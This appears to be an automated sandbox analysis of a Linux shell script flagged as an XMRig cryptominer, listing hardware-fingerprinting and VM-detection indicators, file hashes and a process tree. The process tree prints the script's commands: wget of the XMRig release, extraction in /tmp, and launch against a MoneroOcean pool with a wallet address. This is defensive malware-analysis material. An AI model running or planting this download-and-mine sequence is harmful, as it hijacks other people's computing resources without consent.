xmrig_linux | cac925a1b75eb4e0ab9d5be4399962febb10fa3f720ad07d0645183d7b051ffa

Analysis

max time kernel
1799s
max time network
1799s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
13-07-2024 18:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

triage.sh
Size

409B
MD5

82f2b8313ca94ab96c1c4dcef958a7e5
SHA1

610a6b6624debdcb9059f6d6dd6e4feba96e5793
SHA256

cac925a1b75eb4e0ab9d5be4399962febb10fa3f720ad07d0645183d7b051ffa
SHA512

d9bcdd0a0afe819c3bc4e6829d4d1e3ac9ee5fbc00c2dcb9b8aa8aedc84e5d3ef742c98d34b9f3ee135715fe9d62945ca2044a73c8a8b2f91b04f209a3fb0c39

Score

10^/10

xmrig_linux antivm miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/files/fstream-4.dat	family_xmrig
behavioral1/files/fstream-4.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Executes dropped EXE 1 IoCs

Processes:

xmrig

ioc	pid	Process
/tmp/xmrig-6.17.0/xmrig	2488	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

xmrig

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

Processes:

xmrig

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

xmrig

description	ioc	Process
File opened for reading	/proc/cpuinfo	xmrig

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

Processes:

xmrig

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

xmrig

description	ioc	Process
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/bus/node/devices/node0/meminfo	xmrig
File opened for reading	/sys/bus/dax/target_node	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	xmrig
File opened for reading	/sys/bus/cpu/devices	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/bus/node/devices/node0/cpumap	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	xmrig
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	xmrig
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	xmrig
File opened for reading	/sys/fs/cgroup/cgroup.controllers	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/kernel/mm/hugepages	xmrig
File opened for reading	/sys/bus/node/devices/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/id	xmrig

Reads runtime system information 7 IoCs

Reads data from /proc virtual filesystem.

Processes:

tarxmrigwget

description	ioc	Process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/sys/kernel/random/boot_id	tar
File opened for reading	/proc/mounts	xmrig
File opened for reading	/proc/self/cpuset	xmrig
File opened for reading	/proc/meminfo	xmrig
File opened for reading	/proc/driver/nvidia/gpus	xmrig
File opened for reading	/proc/sys/crypto/fips_enabled	wget

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgettar

description	ioc	Process
File opened for modification	/tmp/xmrig-6.17.0-linux-x64.tar.gz	wget
File opened for modification	/tmp/xmrig-6.17.0/xmrig	tar
File opened for modification	/tmp/xmrig-6.17.0/SHA256SUMS	tar
File opened for modification	/tmp/xmrig-6.17.0/config.json	tar

/tmp/triage.sh
/tmp/triage.sh
1⤵
PID:2476
- /usr/bin/wget
  wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:2477
- /usr/bin/tar
  tar xf xmrig-6.17.0-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:2484
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:2485
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:2485
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:2485
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:2485
- /usr/bin/clear
  clear
  2⤵
  PID:2486
- /usr/bin/nproc
  nproc
  2⤵
  PID:2487
- /tmp/xmrig-6.17.0/xmrig
  ./xmrig -o gulf.moneroocean.stream:10001 -u 47XoXb55DyecrQ1aaBnqXdZiDntoLvXpZTcd6g5mjLHqgx3yMvTTMccNdPnnZxoXA48DzFBGrjoVi4jko7bxTJbr6zZQjjZ -p Triage --cpu-priority 4 --threads 1
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
165B

MD5
0fe74b270d9486c0c0847d393b55466d

SHA1
d5432f95d5cd009b5e286d974ec9d12edfecc695

SHA256
4e4d214577630990cc28cbe323ec5f5b426c6aea4800a94abbc20547966a4921

SHA512
539bc732c4435a883420e9480c3981219a8a5426d99d8fd9346cfee882de779b6ac6b90d8322305c00c22859986b11f8722f09b48adb6029617bf18954b28fc5

Download Submit
/tmp/xmrig-6.17.0-linux-x64.tar.gz

Filesize
3.4MB

MD5
29451e2e516cb19a9d81a87c59e69f4f

SHA1
123a521ef3d37e9eeed6780abd70ec39813c136d

SHA256
75ce5d4d52c46a7c8c604e1de3549cba9dc4b07405d6598e12b6f21f50247739

SHA512
ed8b9a0afbafa3261996a2a42e95b07d404a1d362a79b43c764c3d2511957d90dd18c61329c6d341c9ec17b1713afba4db5ab2f9f452439cc878619b927fc992

Download Submit
/tmp/xmrig-6.17.0/SHA256SUMS

Filesize
150B

MD5
b2cf09dba10f008958364cee2d2b1aa4

SHA1
35e5d859b9671216b0040b423763260b517e145d

SHA256
a73b944844c3d1d87a7db4089cd36f59e7558ad4ff03f70ff88834dbb6ed65ac

SHA512
d55a79ef4c4d35ef24e14cebcaa900d778bd958fbad40be37fff22865dbaaca1fb6b40d443a3868504ce60f8cb241da38af289ff2f4b2219fd5f1810908d3b5a

Download Submit
/tmp/xmrig-6.17.0/config.json

Filesize
2KB

MD5
f7e601938baefd87b9b34c696009d6a5

SHA1
7573c2611f292b3e388db97c12fbc6a0473aa216

SHA256
23754944047dd29fd93d7a486bb19a087e33e7d59bddd92a7e20ac75f92697c9

SHA512
24c331a1af647b62a444b44c5af51e049a41099c302c98379d7e9d6049a7d87b9f74567fa181cccc3dbdac304da6564577fddd3c93a03f7ac70e74b8705dbb76

Download Submit
/tmp/xmrig-6.17.0/xmrig

Filesize
8.6MB

MD5
1f29fc7e6e27a5a7e92ce400cf2eaf2f

SHA1
901d534f3fe2a57f660a9e344734f51fd9fbd869

SHA256
bf8dc5eca570a1a0d702303547b736cff9df54c31745dde90dfc429580c0cc28

SHA512
ab2e96abaa5d543656a72f3f97b8ae4fb857e8ceb0b73fbcf4f22e45eb39aeb95a61e6d5558c58ee32bfcafed381fb84ea48bf413875d23d98f634c6c3c45aea

Download Submit